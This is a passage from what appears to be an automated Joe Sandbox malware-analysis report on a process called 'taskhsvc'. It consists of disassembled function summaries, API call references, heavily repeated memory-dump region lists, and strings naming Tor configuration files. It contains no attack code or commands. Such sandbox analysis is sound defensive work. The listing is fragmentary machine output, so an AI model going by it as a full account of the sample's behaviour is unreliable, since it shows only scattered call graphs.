    • strerror.MSVCRT ref: 003266A8
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 003265AE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,003266E8), ref: 003265E2
    • __stack_chk_fail.LIBSSP-0 ref: 00326762
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00326730
      • Part of subcall function 00326573: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C0EBF), ref: 003265A7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001D5156, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 001D55E3
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00319C41, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
    APIs
    • abort.MSVCRT ref: 00319C9A
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 00319D32
    • __stack_chk_fail.LIBSSP-0 ref: 00319D4C
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00210D7D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021307F), ref: 00210DD3
    • __stack_chk_fail.LIBSSP-0 ref: 00210E2D
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE588
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE5C7
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE60E
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE655
      • Part of subcall function 001DE526: abort.MSVCRT ref: 001DE730
      • Part of subcall function 001DE526: __stack_chk_fail.LIBSSP-0 ref: 001DE7A0
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00231A28, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
    APIs
    • abort.MSVCRT ref: 00231A78
      • Part of subcall function 003EC083: event_set_log_callback.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,00231A82), ref: 003EC09A
      • Part of subcall function 003EC083: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00231A82), ref: 003EC0AB
      • Part of subcall function 003EC0B2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00231A8E), ref: 003EC0DC
    • memset.MSVCRT ref: 00231AA4
      • Part of subcall function 002319D3: __stack_chk_fail.LIBSSP-0 ref: 00231A21
      • Part of subcall function 003EC11F: abort.MSVCRT ref: 003EC173
      • Part of subcall function 003EC11F: event_config_new.LIBEVENT-2-0-5 ref: 003EC183
      • Part of subcall function 003EC11F: abort.MSVCRT ref: 003EC1C5
      • Part of subcall function 003EC11F: event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1D8
      • Part of subcall function 003EC11F: event_config_set_num_cpus_hint.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1F5
      • Part of subcall function 003EC11F: event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC208
      • Part of subcall function 003EC11F: event_base_new_with_config.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC213
      • Part of subcall function 003EC11F: event_config_free.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC223
      • Part of subcall function 003EC11F: exit.MSVCRT ref: 003EC25C
      • Part of subcall function 003EC11F: event_get_version.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC268
      • Part of subcall function 003EC11F: __stack_chk_fail.LIBSSP-0 ref: 003EC2A5
    • __stack_chk_fail.LIBSSP-0 ref: 00231AE6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00229AAB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
    APIs
      • Part of subcall function 0022990B: SHGetSpecialFolderLocation.SHELL32 ref: 00229964
      • Part of subcall function 0022990B: _getcwd.MSVCRT ref: 0022997C
      • Part of subcall function 0022990B: SHGetPathFromIDListA.SHELL32 ref: 002299D9
      • Part of subcall function 0022990B: __stack_chk_fail.LIBSSP-0 ref: 00229AA1
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • __stack_chk_fail.LIBSSP-0 ref: 00229B28
    Strings
    • z9C, xrefs: 00229AFC
    • C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\torrc-defaults, xrefs: 00229AE0, 00229AEC
    • C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\torrc, xrefs: 00229B0C, 00229B18
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F3047, Relevance: 6.2, APIs: 4, Instructions: 200
    APIs
    • getsockname.WS2_32 ref: 001F30A2
    • __stack_chk_fail.LIBSSP-0 ref: 001F33E6
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0032B94F: abort.MSVCRT ref: 0032B9AB
      • Part of subcall function 0032B94F: abort.MSVCRT ref: 0032B9EA
      • Part of subcall function 0032B94F: memset.MSVCRT ref: 0032BA05
      • Part of subcall function 0032B94F: __stack_chk_fail.LIBSSP-0 ref: 0032BAEA
      • Part of subcall function 001E8718: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001EF09F), ref: 001E873F
    • free.MSVCRT ref: 001F31CA
      • Part of subcall function 0032DA95: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002564FC), ref: 0032DAE3
      • Part of subcall function 0032EC9C: abort.MSVCRT ref: 0032ED00
      • Part of subcall function 0032EC9C: memset.MSVCRT ref: 0032ED1B
      • Part of subcall function 0032EC9C: __stack_chk_fail.LIBSSP-0 ref: 0032EDD9
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D854
